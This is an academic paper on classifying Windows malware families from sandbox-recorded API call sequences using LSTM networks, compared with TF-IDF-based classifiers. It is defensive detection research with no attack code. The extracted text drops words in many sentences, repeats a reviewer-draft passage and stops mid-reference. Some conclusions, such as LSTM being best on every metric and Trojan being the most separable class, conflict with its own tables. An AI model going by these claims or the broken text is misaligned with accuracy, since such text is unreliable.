real-world applications demonstrate the good performance of the framework for malware detection. Furthermore, the framework can be generalized to all mobile applications for malware detection (Peiravian & Zhu, 2013). Kolosnjaji et al. (2016) proposed an approach for malware classification that uses hybrid neural networks containing two convolutional layers and one recurrent layer o obtain the best features for classification. The authors optimal classification results by combining convolutional and recurrent layers in the neural network architecture. The approach outperformed not only other simpler neural architectures, but also most widely used hidden Markov models and support vector machines (Kolosnjaji et al., 2016). Tian et al. (2010) proposed a scalable approach for malware vs. cleanware classification and malware family classification by investigating behavioral features using logs of various API calls. The authors used an automated tool running in a virtual environment to extract API call features from executable. Later, pattern recognition algorithms and statistical methods are applied to differentiate between files. The research benefited from a dataset of 1,368 malware and 456 cleanware to conduct experimental results. As per the result, this approach provides an accuracy of over 97% distinguishes malware from cleanware. The the classification of malware into different families (Tian et al., 2010). Alazab et al. (2010) proposed an approach to detect obfuscated malware by investigating the structural and behavioral features of API calls. The authors sed n-gram statistical analysis for API calls to analyze the similarities and distance of unknown malware with known behavior so that obfuscated malware could be detected efficiently. The authors used a dataset of 242 malware and 72 benign files to obtain experimental results. The approach demonstrates the accuracy of 96.5% for the unigram model (Alazab et al., 2010). As far as the suggested studies are examined, it is generally seen that sequential data loss methods such as TF-IDF are preferred in the, or traditional machine learning methods are applied. Although deep learning are not algorithmically new, they have become in the field of machine learning today, as they are easy to implement technologically and can be Catak et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.285 5/23 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.285 trained with high-performance computation on systems such as GPUs. For this reason, our study differs from other studies. PRELIMINARIES In this section, we briefly introduce Windows API calls, cuckoo sandbox environment, VirusTotal service, and LSTM algorithm used for our proposed malware classification model. Windows API Calls The Windows API is an interface to application developers for developing applications on the Windows operating system (Hampton, Baig & Zeadally, 2018), designed mostly for the interaction between developers and the operating system. Therefore, the operating system offers many services as API (https://docs.microsoft.com/en-us/windows/desktop/ apiindex/windows-api-list). An application developed to run on the Windows operating system must call the interfaces presented as APIs to use a function offered by the operating system. When an application is running on any operating system, it calls several API to complete an action. For example, when an application is requested to create a file, CreateFileA Windows API (https://docs.microsoft.com/en-us/windows/desktop/api/FileAPI/nf-fileapi-createfilea) is called. All API calls made by an application on the system can show the overall behavior of that application. Therefore, API calls-based approach is widely applied in the dynamic malware analysis showing how malware can behave accurately. In this study, we extract Windows API calls made by malware on the operating system, and generate a feature set. Later, we use these features to train the classifier in order to detect malware. Cuckoo Sandbox The Cuckoo Sandbox app is a free and public sandbox application compatible with different operating systems (Ali et al., 2019). A detailed analysis report of the files considered as suspicious (Noor, Abbas & Shahid, 2018) can be produced as part of malware analyses using this application. With the Cuckoo Sandbox application, it is possible to prepare and run malicious software in an environment similar to a real working environment. It’s used to analyze files and collect comprehensive analysis results about the behavior and structural features of malicious software, such as API calls of malware, network traffic, memory dump, etc. The collected data are saved in a MongoDB database in JSON format. Cuckoo Sandbox has two main components. The first component is the management machine used to start the analysis of malware, to store the results in the database, and to start the web service provided for the users. The other component is the analysis machine, virtual or physical machine, on which the malicious software is run, the actual analysis is performed, similar to the real working environment of the malicious software. In our study, the Windows API call sequences representing the behavior of malware are collected using this application. Catak et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.285 6/23 https://peerj.com https://docs.microsoft.com/en-us/windows/desktop/apiindex/windows-api-list https://docs.microsoft.com/en-us/windows/desktop/apiindex/windows-api-list https://docs.microsoft.com/en-us/windows/desktop/api/FileAPI/nf-fileapi-createfilea http://dx.doi.org/10.7717/peerj-cs.285 VirusTotal Service VirusTotal is an online service that analyzes suspicious files or URLs (Shiel & O’Shaughnessy, 2019). Different antivirus application engines and website browsers execute suspicious files/URLs for malicious activities. Each antivirus application engine provides a detailed report, including registry access, DNS resolutions, etc. VirusTotal service provides analysis reports from antivirus applications with an interface without any interpretation, because this service includes an extensive analysis archive, users can perform a new analysis as well as other analysis reports of other users. VirusTotal provides an interface for receiving services without using a web browser (VirusTotal Public API v2.0), giving the possibility to application developers to nalyze files and URLs (Martn, Hernndez & de los Santos, 2019) automatically. The body of the response is usually a JSON object containing the analysis results of antivirus application engines or web browsers separately. We have identified the families of malware by processing the results we obtain from the API, and we have assigned labels to each malware. Long-Short Term Memory LSTM is a Recurrent Neural Network (RNN) based deep learning method (Muzaffar & Afshari, 2019). LSTM was developed because RNN not successful enough in long-term learning. LSTM has an architecture that can remember and learn any long-term dependency at random intervals. It is considered a successful method to analyze data or events that have a specific relationship, especially in order of time (Hochreiter & Schmidhuber, 1997). For example, if the time series data are x={x1,...,xT}, h={h1,...,hT} is the hidden vector sequence and y={y1,...,yT} shows an output vector sequence, then T iteration is defined as follows: ht =H(Wxhxt +Whhht−1+bh) (1) yt =F(Whyht +by) where Wxh, Whh, and Why are the computation time connection weight matrices and F is the activation function. System architecture This research has two main objectives; first, we created a relevant dataset, and then, using this dataset, we did a comparative study using various machine learning to detect and classify malware automatically based on their types. Dataset creation One of the most important contributions of this work is the new Windows PE Malware API sequence dataset, which contains malware analysis information. are 7107 malware from different classes in this dataset. The Cuckoo Sandbox application, as explained above, is used to obtain the Windows API call sequences of malicious software, and VirusTotal Service is used to detect the classes of malware. Catak et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.285 7/23 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.285 Figure 1 General system architecture. Architecture consists of 3 parts; data collection, Data pre- processing, and Data classification. Full-size DOI: 10.7717/peerjcs.285/fig-1 Figure 1 illustrates the system architecture used to collect the data and to classify them using LSTM algorithms. Our system consists of three main parts, data collection, data pre-processing and analyses, and data classification. The following steps were followed when creating the dataset. Cuckoo Sandbox application is installed on a computer running Ubuntu Linux distribution. The analysis machine was run as a virtual server to run and analyze malware. The Windows operating system is installed on this server. The firewall has been turned off, and no operating system updates have been made to prevent any malware from running. The tools versions are; Ubuntu 17.10, Cuckoo 2.0.4, Windows 7 Analysis OS, VirtualBox 5.1.30, Python 3.6.5. Once the data are collected, we start the process to analyses and pre-process the malware using Cuckoo as a dynamic More than 20,000 malware have been run separately in the Cuckoo Sandbox application, and the results are all stored in a MongoDB database. From this analysis information, we obtained the behavioral data of the malware on the analysis machine. This behavior is all Windows API call requests that the malware has made on the Windows 7 operating system. Some of the data pre-processing activities are: • Indexing Windows API calls: When we examined the Windows API calls in the dataset, we found that there were 342 different API calls. These API calls are indexed from 0 to 341. As a result, each row in the dataset represents the API call sequence for alware analysis. • Dataset filtering: Since these malware are developed for a specific application with a target, we filtered the API call sequence and discarded the rows that did not contain at least 10 different API calls from the dataset. • Analysis of malware using VirusTotal Public API: We determined the hash values of each of malware that we analyzed and inquired these hash values with VirusTotal service. Catak et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.285 8/23 https://peerj.com https://doi.org/10.7717/peerjcs.285/fig-1 http://dx.doi.org/10.7717/peerj-cs.285 0 200 400 600 800 1,000 Adware Backdoor Downloader Dropper Spyware Trojan Virus Worms 379 1001 1001 891 832 1001 1001 1001 Malware class distribution Figure 2 The number of malware in each class. Full-size DOI: 10.7717/peerjcs.285/fig-2 We stored the analysis results from the VirusTotal service into a database. Thus, each malware was analyzed by many different antivirus engines, and the results of the analysis were recorded. • Processing of analysis results: Based on the results of each analysis, we have obtained using this service, we have labeled all the malware. During this process, we found out that different antivirus applications give different results for the same malware, or sometimes not every antivirus application can detect every malware. For example, when we analyze the hash value of 06e76cf 96c7c7a3a138324516af 9fce8 in the VirusTotal service, many of the software indicate that this file is a worm, while DrWeb says it is a trojan, and Babable end that it is a clean file. Therefore, in determining the classes of malware, we considered the majority class in the analyzes. If the majority of engines agree that a particular sample is malicious, then it is as positive. • Creating the dataset: Finally, the labeled training dataset was created by matching the Windows API call sequences and the malware classes. This dataset contains 8 different classes of malware. Our dataset is publicly available on GitHub website (https://github.com/ocatak/malware_api_class). The number of malware included in these classes is shown in Fig. 2. In this study, the malware classification method was developed by using the LSTM algorithm. The LSTM algorithm does not require any vectorization model, such as TF-IDF, because it works with sequential data. However, it is necessary to compare the classification performance of the developed method with other traditional machine learning algorithms such as support vector machine, decision tree, k-nearest neighbor. TF-IDF model traditional classification algorithms In ‘TF-IDF’, we describe how to transform the text with the TF-IDF method. Catak et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.285 9/23 https://peerj.com https://doi.org/10.7717/peerjcs.285/fig-2 https://github.com/ocatak/malware_api_class http://dx.doi.org/10.7717/peerj-cs.285 TF-IDF Term frequency-inverse document frequency based text dataset vectorization is a traditional method to create a numerical dataset. Each term t in a document d is assigned a weight assignment according to the frequency of occurrence in that document (Manning, Raghavan & Schütze, 2008). This process is called term frequency, tf(t,d). The vector, thus formed, can be considered as a digitized summary of a document. Let the term t be represented by f (t,d) of the raw frequency. Term frequency can be found as follow: tf(t,d)= f (t,d) (2) However, a dataset generated only by the term frequencies assigns equal importance to each term. The of occurrence of any in a collection The inverse document frequency (IDF) is defined as the logarithm of the division of the number of documents in the, N , to the document frequency, dft . idft = log N dft (3) Thus, if the dft in the documents in the collection is low, the idft value will be high, and in the high dtf frequency the idft value will be low. To calculate the weights of the terms contained in each document, the term frequency, tft,d, and inverse document frequency, idft , are combined to form the term frequency-inverse document frequency (TF-IDF) matrix. tf −idft = tft,d×idft (4) In this study, the malware classification method was developed by using the LSTM algorithm. The LSTM algorithm does not require any vectorization model, such as TF-IDF, because it works with sequential data. However, it is necessary to compare the classification performance of the developed method with other traditional machine learning algorithms such as support vector machine, decision tree, k-nearest neighbor. The TF-IDF model is used only because classification algorithms work with numerical data only. TF-IDF is not used in our odel. Classifier learning The steps 1–7 are run separately for each type of malware, creating classification models for 8 different types. The experiments are done using the Python programming language and machine learning libraries Keras, Tensorflow, and Scikit-learn. We used the Keras library to build LSTM networks. We have created a two-tier LSTM structure. In Algorithm 1, we explain the general steps of our classifier building stage. Accordingly, our algorithm’s both time and space complexity is O(n). In the algorithm, there is the main loop to build a representative classifier for each distinct label. Figure 3 shows the flowchart of the overall method. The process of malware classification includes the following steps in the proposed solution: 1. We select the that we want to classify. 2. We process the dataset for the selected malware type. The model assigns label 1 to the malware type information of interest and label 0 to other categories. Catak et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.285 10/23 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.285 Algorithm 1 Classifier learning steps 1: Inputs: Malware API call dataset X, malware class labels Y , class set C 2: for each c ∈C do 3: Yc ← { 1, if y =c 0, otherwise FLabels that are belongs to c will be 1, rest are 0 for binary classifier 4: Xtrainc ,Xtestc ,Ytrainc ,Ytrainc ← train_test_split(X,Yc ,0.8) F0.8 training data, 0.2 validation data 5: hc ←LSTM_model_fit(Xtrainc ,Ytrainc ) FLSTM model building with train dataset 6: end for 7: Outputs: A set of classifiers set for each class C, h :X 7→Y 3. A two-tier LSTM-based classification model is defined and created. 4. The classifier is trained using 80% of the data during the training phase. Validation is performed during training with 20% of the data allocated for training. 5. The trained classifier is tested using 20% of the data in the dataset. During this process, API calls of a new software are shown to the classifier and a class label is assigned to these new instances based on the voting results of the models. 6. Training and test results are recorded. 7. The classifier is trained using 80% of the data during the training phase. Validation is performed during training with 20% of the data allocated for training. The training process is shown in Fig. 4. The LSTM network model receives the API calls that each malware makes on the Windows operating system and assigns the class label to ŷ. As we apply the classifiers to each of the 8 malware classes, our classifier is binary ones. Log loss function is used as the loss function, shown in Eq. (5). l(y,ŷ)= 1 L l=|L|∑ l=1 − ( yl log(ŷl)+(1−yl)log(1− ŷl) ) (5) Evaluation Since the dataset that is used in our experiments highly imbalanced, traditional accuracy based performance evaluation is not enough to find out an optimal classifier. We used four different metrics, the overall prediction accuracy, average recall, average precision (Turpin & Scholer, 2006) and F1 score, to evaluate the classification accuracy, which measurement metrics in information retrieval (Manning, Raghavan & Schütze, 2008; Makhoul et al., 1999). EXPERIMENTS AND RESULTS In this study, we performed the classification of malware belonging to different families in the dataset described in Section 3.1 with the LSTM algorithm. All experiments were run in a Python environment, and all algorithm codes have been modified to build a Catak et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.285 11/23 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.285 Start Split dataset into Train (80% Xtrain) and Test (20% Xtest) foreach class c ∈ C change corresponding label Yc ← { 1, if y = c 0, otherwise Train test split for the dataset with new label Xtrain, Xtest, Ytrain, Ytrain ← train test split(X, Yc, 0.8) Build classifier hc for class c and evaluate the h using Xtest, Ytest set of classifiers:h Overall test of h Model Building Exit classifier building loop Validation data Model building loop Figure 3 FLFlow chart of the overall system. Full-size DOI: 10.7717/peerjcs.285/fig-3 classification model from the given data. Our codes can be accessed on our GitHub repository (https://github.com/ocatak/malware_api_class/tree/master/src). As we have explained in the previous sections, we can analyze the sequential data with the LSTM algorithm that we have used within the scope of this study and create a classification model as a result. When it is desired to a model using other classification algorithms, the existing text data should be digitized. For this purpose, we used the TF-IDF method, which is the most common text digitization method. We used our numerical data set with this method with the k-Nearest Neighborhood, Decision Tree (DT), and Support Vector Machine (SVM) algorithms. In ‘TF-IDF’, we describe how to transform the text with the TF-IDF method. In this section, we will share the experimental results for binary and multi-class classification separately. We designed 2 different experiments for multi-class classification; Catak et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.285 12/23 https://peerj.com https://doi.org/10.7717/peerjcs.285/fig-3 https://github.com/ocatak/malware_api_class/tree/master/src http://dx.doi.org/10.7717/peerj-cs.285 LSTM - 2 LSTM - 1 <Start> LZCopy CreateProcess GetPriorityClass EncryptFile OpenProcess Malicious/Benign LSTM Based Classification Model Figure 4 LSTM classification model with Windows API calls. Full-size DOI: 10.7717/peerjcs.285/fig-4 single layer LSTM and two layers LSTM. The purpose of doing this is that two-layer LSTM models are overfitting in some cases. Model configuration Since we wanted to create a model for each class, we edited the class information in the dataset. We assigned 1 for the malware class to be analyzed and 0 for the others. Since we do this while creating each classification model, these models perform binary type classification. For example, the result of the classification model created for the Adware class is Adware or other. We used tanh, relu, sigmoid, softplus, softsign, softmax and linear activation functions and created eight different models for each malware class. We have used the same flow layers, although there are different numbers of data analyzed at the stage of creating malware models. An example of the flow layers of the models is the Adware classification model, which is shown in Fig. 5. Binary classification results Table 1 shows the classification performance of LSTM and conventional algorithms results. Although the accuracy rates of the traditional methods and the deep learning methods seem to be similar, F1 values give more meaningful information due to the lack of close class distributions. F1 represents the balance between precision and recall values. Therefore, the F1 values obtained by the deep learning method better than the F1 values obtained by the traditional methods. This suggests that deep learning is better for analyzing malware behavior. Catak et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.285 13/23 https://peerj.com https://doi.org/10.7717/peerjcs.285/fig-4 http://dx.doi.org/10.7717/peerj-cs.285 embedding_2: Embedding input: output: (None, 342) (None, 342, 16) lstm_3: LSTM input: output: (None, 342, 16) (None, 342, 100) dropout_2: Dropout input: output: (None, 342, 100) (None, 342, 100) lstm_4: LSTM input: output: (None, 342, 100) (None, 342, 100) flatten_2: Flatten input: output: (None, 342, 100) (None, 34200) dense_2: Dense input: output: (None, 34200) (None, 2) Figure 5 The classification model layers and their neurons. Full-size DOI: 10.7717/peerjcs.285/fig-5 As expected, based on the experimental results, the classification performance of the models created by using traditional classification algorithms using the TF-IDF based vectorization method, where the sequence information is not used, is lower than the performance of the model created using the LSTM algorithm. Considering all four classification evaluation metrics, we proposed a practical implementation of the malware detection model using the LSTM algorithm. Our proposed method is more efficient as we obtained better scores on all the evaluation metrics. Catak et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.285 14/23 https://peerj.com https://doi.org/10.7717/peerjcs.285/fig-5 http://dx.doi.org/10.7717/peerj-cs.285 Table 1 LSTM and conventional algorithms classification results. Adware Backdoor Downloader Dropper Spyware Trojan Virus Worm LSTM Accuracy 0.985 0.877 0.909 0.877 0.876 0.835 0.927 0.865 Precision 0.90 0.60 0.72 0.52 0.46 0.36 0.76 0.57 Recall 0.77 0.40 0.57 0.44 0.42 0.22 0.70 0.37 F1 0.83 0.48 0.64 0.48 0.44 0.27 0.73 0.45 Func. tanh tanh soft sign soft sign soft sign soft sign tanh soft sign k-NN Accuracy 0.976 0.834 0.870 0.819 0.879 0.841 0.859 0.823 Precision 0.89 0.38 0.62 0.19 0.45 0.33 0.47 0.36 Recall 0.59 0.26 0.20 0.13 0.26 0.12 0.21 0.23 F1 0.71 0.31 0.30 0.16 0.33 0.18 0.29 0.28 DT Accuracy 0.954 0.824 0.839 0.815 0.824 0.786 0.856 0.825 Precision 0.53 0.39 0.43 0.32 0.30 0.26 0.48 0.41 Recall 0.80 0.41 0.48 0.38 0.41 0.28 0.52 0.40 F1 0.64 0.40 0.45 0.35 0.35 0.27 0.50 0.40 RBF SVM Accuracy 0.979 0.875 0.876 0.881 0.899 0.867 0.888 0.875 Precision 1.00 0.91 1.00 0.84 0.79 0.87 1.00 0.93 Recall 0.59 0.14 0.12 0.09 0.16 0.07 0.18 0.18 F1 0.74 0.25 0.22 0.16 0.27 0.12 0.31 0.29 Sigmoid SVM Accuracy 0.950 0.864 0.860 0.872 0.886 0.859 0.862 0.851 Precision 0 0.87 0 0 0 0 0 0 Recall 0 0.06 0 0 0 0 0 0 F1 0 0.12 0 0 0 0 0 0 Notes. Bold values indicate the best value of each column. Based on the results and the classification performance shown in Table 1, we conclude that the LSTM model is the best approach that provides the best performance for all evaluation metrics. Multi-class classification results Using our data set, we created several multi-class classification models with 8 different classes are also created. Especially by using different hyper-parameters, the most successful models were tried to be obtained. F1 metric value will be used to compare the analysis results. The classification_report method in the sklearn.metrics the end library was used to calculate the F1, precision, recall, and average values of these values. The average F1 Catak et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.285 15/23 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.285 embedding_18: Embedding input: output: (None, 342) (None, 342, 32) lstm_25: LSTM input: output: (None, 342, 32) (None, 200) dense_18: Dense input: output: (None, 200) (None, 8) Figure 6 Single layer LSTM classification model structure. Full-size DOI: 10.7717/peerjcs.285/fig-6 value produced by this method takes into account the precision and recall values and class weights in the dataset. Single layer LSTM results Single-layer LSTM models have been created that can classify 8 different types of malware. These models produce an output between 0–7. These values represent malware class. Figure 6 shows our single layer LSTM architecture. While creating the models, it is aimed to obtain the best classification model by using many different hyper-parameters. Table 2 shows our hyper-parameter search space. Table 3 shows the best classification performance obtained using following hyper- parameters. The training history, accuracy and loss graphs of the model created by using the best hyper-parameters are given in Figs. 7A and 7B respectively. When the graphics are examined, it is seen that the model education process stops at the 30th epoch. The reason for this situation is that the model comes to the overfitting point. During the model trainings, using the EarlyStopping parameter, it was ensured that the education was terminated without reaching the extreme fit of the model. The Confusion Matrix information obtained as a result of testing the trained classification model is given in Table 4. The analysis results obtained by testing the trained classification model are shown in Table 5. Two layers LSTM results Two-layer LSTM models have been created that can classify 8 different types of malware. These models produce an output between 0–7. Catak et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.285 16/23 https://peerj.com https://doi.org/10.7717/peerjcs.285/fig-6 http://dx.doi.org/10.7717/peerj-cs.285 Table 2 Hyper-parameter search space to tune the model. Hyper-Parameter Search Space Embedding layer number of units 5 - 300 LSTM layer number of units 1 - 300 Activation function: anh Activation function tanh , relu, sigmoid, softplus, softsign, softmax, linear kernel initializer: kernel initializer random_uniform, glorot_uniform, lecun_uniform, uniform Dropout: Dropout 0.1 - 0.9 optimizer: optimizer adam, adadelta, adamax, nadam Table 3 Best hyper-parameters. Hyper-Parameter Value Embedding units 32 units: Units 200 Activation sigmoid Kernel_initializer glorot_uniform Dropout 0.2 Optimizer adam 0 5 10 15 20 25 30 epoch 0.45 0.40 0.35 0.30 0.25 0.20 0.15 ac cu ra cy training validation (a) Accurancy (b) Loss 0 5 10 15 20 25 30 epoch 2.0 1.9 1.8 1.7 1.6 1.5 1.4 lo ss training validation Figure 7 Single layer LSTM model accuracy-loss graphics. (A) Accuracy; (B) Loss. Full-size DOI: 10.7717/peerjcs.285/fig-7 Table 6 shows the best classification performance hyper-parameters. According to Fig. 8, the model training process stops at the 16th epoch because of overfitting limit. During the model trainings, the training was ended before the model reached the extreme fit state by using the EarlyStopping parameter. Confusion Matrix is given in Table 7. Table 8 shows the two layers LSTM model classification performance results. Multi-class classification model results obtained using different algorithms are given in Table 9. Catak et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.285 17/23 https://peerj.com https://doi.org/10.7717/peerjcs.285/fig-7 http://dx.doi.org/10.7717/peerj-cs.285 Table 4 Single Layer LSTM Model Confusion Matrix. 49 0 8 4 1 5 4 0 1 92 6 15 22 44 6 17 6 10 124 22 6 22 4 5 3 12 6 80 21 53 6 0 2 22 7 16 41 48 17 9 3 23 13 25 25 90 15 6 7 6 1 19 8 20 131 3 2 30 6 17 19 62 20 55 Table 5 Single Layer LSTM Model Classification Results. Precision Recall F1 Adware 0.67 0.69 0.68 Backdoor 0.47 0.45 0.46 Downloader 0.73 0.62 0.67 Dropper 0.40 0.44 0.42 Spyware 0.29 0.25 0.27 Trojan 0.26 0.45 0.33 Virus 0.65 0.67 0.66 Worm 0.58 0.26 0.36 Average 0.50 0.47 0.47 Table 6 Hyper-parameter search space to tune the model. Hyper-Parameter Search Space Embedding units 16 units: units 25 LSTM-1 activation : softsign softsign LSTM-1 kernel_initializer glorot_uniform LSTM-2 activation : softsign softsign LSTM-2 kernel_initializer glorot_uniform LSTM-2 recurrent_dropout 0.2 Dense kernel_regularizer regularizers.l2(0.01) Dense activity_regularizer regularizers.l1(0.01) optimizer: adam Optimizer adam Results As expected, based on the experimental results, LSTM based malware classification than the TF-IDF based conventional machine learning algorithms’ classification performance. Considering all the four classification evaluation metrics, we proposed a practical implementation of the malware classification model using sequential based Windows OS API calls and LSTM networks. Our proposed method is more efficient as we get better scores on evaluation metrics. Catak et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.285 18/23 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.285 0 2 4 6 8 10 12 14 16 epoch 0.35 0.30 0.25 0.20 0.15 0.40 ac cu ra cy (a) Accuracy (b) Loss 0 2 4 6 8 10 12 14 16 epoch 2.0 1.9 1.8 1.7 1.6 lo ss training validation training validation Figure 8 Two layers LSTM model accuracy-loss graphics. (A) Accuracy; (B) Loss. Full-size DOI: 10.7717/peerjcs.285/fig-8 Table 7 Two layers LSTM Model Confusion Matrix. Table 6. Hyper-parameter search space to tune the model. Hyper-Parameter Search Space Embedding units 16 units 25 LSTM-1 activation softsign LSTM-1 kernel initializer glorot uniform LSTM-2 activation softsign LSTM-2 kernel initializer glorot uniform LSTM-2 recurrent dropout 0.2 Dense kernel regularizer regularizers.l2(0.01) Dense activity regularizer regularizers.l1(0.01) Optimizer adam 0 2 4 6 8 10 12 14 16 epoch 0.35 0.30 0.25 0.20 0.15 0.40 a c c u ra c y (a) Accuracy (b) Loss 0 2 4 6 8 10 12 14 16 epoch 2.0 1.9 1.8 1.7 1.6 lo s s training validation training validation Figure 8. Two Layers LSTM Model accuracy-loss graphics Table 7. Two layers LSTM Model Confusion Matrix 0 1 2 3 4 5 6 7 predicted label 0 1 2 3 4 5 6 7 tr ue la be l 53 1 2 8 4 0 2 1 2 94 7 33 21 24 7 15 4 15 122 29 10 7 8 4 12 19 14 75 19 21 8 13 4 38 11 38 31 14 13 13 4 35 18 46 29 29 25 14 6 10 7 18 8 7 133 6 2 56 11 31 13 13 43 42 Table 8 shows the two layers LSTM model classification performance results.415 Multi-class classification model results obtained using different algorithms are given in Table 9.416 4.4 Results417 As expected, based on the experimental results, LSTM based malware classification model’s performance418 is better than the TF-IDF based conventional machine learning algorithms’ classification performance.419 Considering all the four classification evaluation metrics, we proposed a practical implementation of the420 14/17 PeerJ Comput. Sci. reviewing PDF | (CS-2020:03:47276:1:3:CHECK 6 Jun 2020) Manuscript to be reviewedComputer Science Based on the results presented in Section 4.2 and Section 4.3 the computation results shown in Table 1, it can be concluded that LSTM is the best approach that provides best results for all evaluation metrics. On the other hand, if we compare the training periods, the training of LSTM models takes longer. The features of the computer where the experiments are carried out are as follows; Windows 7(64 bit), Intel(R) Core(TM) i7-2600 CPU@ 3.40GHZ, and 6GB RAM. The training durations are • Single layer LSTM: 64.78 min • Two lyers LSTM: 42.82 min • Decision Tree: 1.36 min • kNN: 5.26 min Catak et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.285 19/23 https://peerj.com https://doi.org/10.7717/peerjcs.285/fig-8 http://dx.doi.org/10.7717/peerj-cs.285 Table 8 Two layers LSTM model classification performance results. Precision Recall F1 Adware 0.61 0.75 0.67 Backdoor 0.35 0.46 0.40 Downloader 0.64 0.61 0.62 Dropper 0.27 0.41 0.33 Spyware 0.23 0.19 0.21 Trojan 0.25 0.14 0.18 Virus 0.56 0.68 0.61 Worm 0.39 0.20 0.26 Average 0.40 0.41 0.39 Table 9 Multi-class classificaton model performance results. Precision Recall F1 LSTM 0.50 0.47 0.47 2LSTM 0.40 0.41 0.39 DT 0.40 0.41 0.40 kNN 0.35 0.35 0.34 RF 0.46 0.47 0.46 SVM 0.78 0.29 0.29 • RF: 6.8 min • SVM: 13.62 min Sequential data are used for LSTM While making the vectorizing process using the TF-IDF model with conventional methods. According to confusion matrices on Tables 4–7, we can conclude that the most discriminating malware class is Trojan and the least discriminating class is Spyware. From these results, we can conclude that the samples belonging to the Spyware malware class do not follow a particular API call sequence. Although the model complexity was increased with 2 layers of LSTM, and we did not see a significant difference when we examined the classification performances. CONCLUSION AND FUTURE WORKS The purpose of this study was to create a dataset by obtaining runtime system calls made by 7107 malicious software on Windows 7. As a result, we built a dataset that contains the malware behavioral data at runtime and class labels to which the software was included. classification model is proposed, and this dataset created a model for malware detection using deep learning method LSTM. We build separate classification models for each malware family and found that the results of the classification of these models showed a success rate between 83.5% to 98.5%. We can say that our classification method exhibits excellent performance because Catak et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.285 20/23 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.285 VirusTotal services malware family labeling cannot be accurate. Also we showed that single- layer LSTM and two-tier LSTM models achieved almost the same classification results. Thus, the complexity of the model doesn’t increase performance. Although our dataset contains instances that belong to some malware families with unbalanced distribution, we have shown that this problem does not affect classification performance. Our research can be applied to other malware families as well because the behavior demonstrated by metamorphic malware in an operating system is similar do the other family members. As a result, the LSTM approach can be used in the classification of metamorphic malware, and this study is a conceptual proof of this finding. It is assumed that the malware did not detect the sandbox environment in the dataset we used in this analysis. Some sophisticated malware the potential to identify that they are being run in an isolated environment by using the images methods have started to be introduced instead of running such malware in a sandbox environment to detect such malware that changes behavior by detecting an anti-VM environment. As future work, we intend to use malware images method to classify the correctly labeled dataset. Besides, we want to use other sequential data classification algorithms used before deep learning. ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests The authors declare there are no competing interests. Author Contributions • Ferhat Ozgur Catak and Ahmet Faruk Yazı conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • Ogerta Elezaj and Javed Ahmed analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: The Mal-API-2019 Dataset is available at GitHub: https://github.com/ocatak/malware_api_class Python source folder is also available at GitHub: https://github.com/ocatak/malware_ api_class/tree/master/src. REFERENCES Ahmed ME, Nepal S, Kim H. 2018. ‘‘MEDUSA: Malware Detection Using Statistical Analysis of System’s Behavior’’. In: IEEE 4th international conference on collaboration and internet computing (CIC). Piscataway: IEEE. Catak et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.285 21/23 https://peerj.com https://github.com/ocatak/malware_api_class https://github.com/ocatak/malware_api_class/tree/master/src https://github.com/ocatak/malware_api_class/tree/master/src http://dx.doi.org/10.7717/peerj-cs.285 Alazab M, Layton R, Venkataraman S, Watters P. 2010. Malware detection based on structural and behavioural features of API calls. In: 2010 1st international cyber resilience conference. Alazab M, Venkataraman S, Watters P. 2010. Towards understanding malware be- haviour by the extraction of API calls. In: 2010 second cybercrime and trustworthy computing workshop. 52–59 DOI 10.1109/CTC.2010.8. Ali M, Shiaeles S, Clarke N, Kontogeorgis D. 2019. A proactive malicious software identification approach for digital forensic examiners. Journal of Information Security and Applications 47:139–155 DOI 10.1016/j.jisa.2019.04.013. Çatak FÖ, Yazi AF. 2019. A Benchmark API Call Dataset for Windows PE Malware Classification. CoRR. ArXiv preprint. arXiv:1905.01999. Cheng JY, Tsai T, Yang C. 2013. ’’An information retrieval approach for malware classification based on Windows API calls’’. In: International conference on machine learning and cybernetics. Hampton N, Baig Z, Zeadally S. 2018. Ransomware behavioural analysis on win- dows platforms. Journal of Information Security and Applications 40:44–51 DOI 10.1016/j.jisa.2018.02.008. Hochreiter S, Schmidhuber J. 1997. Long Short-term Memory. Neural Computation 9(81):735–780. Kolosnjaji B, Zarras A, Webster G, Eckert C. 2016. Deep learning for classification of malware system call sequences. Cham: Springer International Publishing, 137–149. Leder F, Steinbock B, Martini P. 2009. ‘‘Classification and Detection of Metamorphic Malware using Value Set Analysis’’. In: International conference on malicious and unwanted software (MALWARE). Makhoul J, Kubala F, Schwartz R, Weischedel R. 1999. Performance measures for information extraction. In: Proceedings of DARPA broadcast news workshop. 249–252. Manning CD, Raghavan P, Schütze H. 2008. Introduction to information retrieval. New York: Cambridge University Press. Martín I, Hernández JA, de los Santos S. 2019. Machine-learning based analysis and classification of Android malware signatures. Future Generation Computer Systems 97:295–305 DOI 10.1016/j.future.2019.03.006. Mehra V, Jain V, Uppal D. 2015. ‘‘DaCoMM: detection and classification of metamor- phic malware’’. In: Fifth international conference on communication systems and network technologies. Muzaffar S, Afshari A. 2019. 